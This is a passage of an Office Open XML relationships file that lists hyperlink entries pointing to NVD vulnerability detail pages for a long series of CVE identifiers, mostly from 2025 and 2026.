TargetMode="External" Id="rId4783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86300" TargetMode="External" Id="rId4784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86302" TargetMode="External" Id="rId4785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86305" TargetMode="External" Id="rId4786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86306" TargetMode="External" Id="rId4787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86308" TargetMode="External" Id="rId4788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86318" TargetMode="External" Id="rId4789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86319" TargetMode="External" Id="rId4790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86321" TargetMode="External" Id="rId4791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86500" TargetMode="External" Id="rId4792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86511" TargetMode="External" Id="rId4793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86513" TargetMode="External" Id="rId4794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86519" TargetMode="External" Id="rId4795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86665" TargetMode="External" Id="rId4796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86666" TargetMode="External" Id="rId4797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86669" TargetMode="External" Id="rId4798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86672" TargetMode="External" Id="rId4799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86673" TargetMode="External" Id="rId4800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86716" TargetMode="External" Id="rId4801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86782" TargetMode="External" Id="rId4802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86808" TargetMode="External" Id="rId4803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86815" TargetMode="External" Id="rId4804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87552" TargetMode="External" Id="rId4805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87921" TargetMode="External" Id="rId4806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87922" TargetMode="External" Id="rId4807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87924" TargetMode="External" Id="rId4808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87925" TargetMode="External" Id="rId4809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87933" TargetMode="External" Id="rId4810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88055" TargetMode="External" Id="rId4811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-26961" TargetMode="External" Id="rId4812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-11831" TargetMode="External" Id="rId4813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14945" TargetMode="External" Id="rId4814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-5318" TargetMode="External" Id="rId4815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64542" TargetMode="External" Id="rId4816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64584" TargetMode="External" Id="rId4817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64588" TargetMode="External" Id="rId4818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64589" TargetMode="External" Id="rId4819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64610" TargetMode="External" Id="rId4820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64618" TargetMode="External" Id="rId4821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64830" TargetMode="External" Id="rId4822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64838" TargetMode="External" Id="rId4823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64854" TargetMode="External" Id="rId4824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64866" TargetMode="External" Id="rId4825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64868" TargetMode="External" Id="rId4826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11821" TargetMode="External" Id="rId4827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12682" TargetMode="External" Id="rId4828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12683" TargetMode="External" Id="rId4829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12843" TargetMode="External" Id="rId4830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12853" TargetMode="External" Id="rId4831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14565" TargetMode="External" Id="rId4832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15247" TargetMode="External" Id="rId4833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15460" TargetMode="External" Id="rId4834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16892" TargetMode="External" Id="rId4835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17274" TargetMode="External" Id="rId4836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17621" TargetMode="External" Id="rId4837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18957" TargetMode="External" Id="rId4838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19057" TargetMode="External" Id="rId4839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19135" TargetMode="External" Id="rId4840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19479" TargetMode="External" Id="rId4841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19612" TargetMode="External" Id="rId4842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19644" TargetMode="External" Id="rId4843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19713" TargetMode="External" Id="rId4844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21269" TargetMode="External" Id="rId4845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2520" TargetMode="External" Id="rId4846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27222" TargetMode="External" Id="rId4847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27227" TargetMode="External" Id="rId4848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27238" TargetMode="External" Id="rId4849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27258" TargetMode="External" Id="rId4850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30368" TargetMode="External" Id="rId4851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38725" TargetMode="External" Id="rId4852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38961" TargetMode="External" Id="rId4853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40635" TargetMode="External" Id="rId4854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45086" TargetMode="External" Id="rId4855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45120" TargetMode="External" Id="rId4856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45694" TargetMode="External" Id="rId4857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46358" TargetMode="External" Id="rId4858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47229" TargetMode="External" Id="rId4859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47880" TargetMode="External" Id="rId4860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48483" TargetMode="External" Id="rId4861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48762" TargetMode="External" Id="rId4862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53956" TargetMode="External" Id="rId4863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54256" TargetMode="External" Id="rId4864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54336" TargetMode="External" Id="rId4865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54543" TargetMode="External" Id="rId4866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54553" TargetMode="External" Id="rId4867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54707" TargetMode="External" Id="rId4868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54717" TargetMode="External" Id="rId4869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55513" TargetMode="External" Id="rId4870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55519" TargetMode="External" Id="rId4871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55564" TargetMode="External" Id="rId4872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55779" TargetMode="External" Id="rId4873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62324" TargetMode="External" Id="rId4874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62671" TargetMode="External" Id="rId4875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63134" TargetMode="External" Id="rId4876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67990" TargetMode="External" Id="rId4877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69402" TargetMode="External" Id="rId4878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69417" TargetMode="External" Id="rId4879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69690" TargetMode="External" Id="rId4880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70481" TargetMode="External" Id="rId4881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70610" TargetMode="External" Id="rId4882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70612" TargetMode="External" Id="rId4883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71356" TargetMode="External" Id="rId4884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71357" TargetMode="External" Id="rId4885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71388" TargetMode="External" Id="rId4886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71440" TargetMode="External" Id="rId4887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71565" TargetMode="External" Id="rId4888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71803" TargetMode="External" Id="rId4889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71858" TargetMode="External" Id="rId4890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72626" TargetMode="External" Id="rId4891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72627" TargetMode="External" Id="rId4892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72725" TargetMode="External" Id="rId4893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72918" TargetMode="External" Id="rId4894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73250" TargetMode="External" Id="rId4895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73254" TargetMode="External" Id="rId4896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73259" TargetMode="External" Id="rId4897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73262" TargetMode="External" Id="rId4898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73287" TargetMode="External" Id="rId4899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73295" TargetMode="External" Id="rId4900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74999" TargetMode="External" Id="rId4901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75629" TargetMode="External" Id="rId4902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75635" TargetMode="External" Id="rId4903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75636" TargetMode="External" Id="rId4904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75637" TargetMode="External" Id="rId4905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75639" TargetMode="External" Id="rId4906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75640" TargetMode="External" Id="rId4907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75642" TargetMode="External" Id="rId4908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75643" TargetMode="External" Id="rId4909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75644" TargetMode="External" Id="rId4910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75646" TargetMode="External" Id="rId4911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75647" TargetMode="External" Id="rId4912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75651" TargetMode="External" Id="rId4913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75652" TargetMode="External" Id="rId4914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75657" TargetMode="External" Id="rId4915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75659" TargetMode="External" Id="rId4916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75660" TargetMode="External" Id="rId4917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75661" TargetMode="External" Id="rId4918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75666" TargetMode="External" Id="rId4919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75667" TargetMode="External" Id="rId4920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75668" TargetMode="External" Id="rId4921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75669" TargetMode="External" Id="rId4922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75670" TargetMode="External" Id="rId4923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75671" TargetMode="External" Id="rId4924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75672" TargetMode="External" Id="rId4925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75674" TargetMode="External" Id="rId4926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75675" TargetMode="External" Id="rId4927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75677" TargetMode="External" Id="rId4928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75678" TargetMode="External" Id="rId4929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75679" TargetMode="External" Id="rId4930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75680" TargetMode="External" Id="rId4931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75681" TargetMode="External" Id="rId4932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75683" TargetMode="External" Id="rId4933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75685" TargetMode="External" Id="rId4934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75687" TargetMode="External" Id="rId4935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75690" TargetMode="External" Id="rId4936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75691" TargetMode="External" Id="rId4937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75692" TargetMode="External" Id="rId4938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75693" TargetMode="External" Id="rId4939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75694" TargetMode="External" Id="rId4940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75695" TargetMode="External" Id="rId4941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75696" TargetMode="External" Id="rId4942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75700" TargetMode="External" Id="rId4943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75701" TargetMode="External" Id="rId4944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75702" TargetMode="External" Id="rId4945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75704" TargetMode="External" Id="rId4946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75705" TargetMode="External" Id="rId4947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 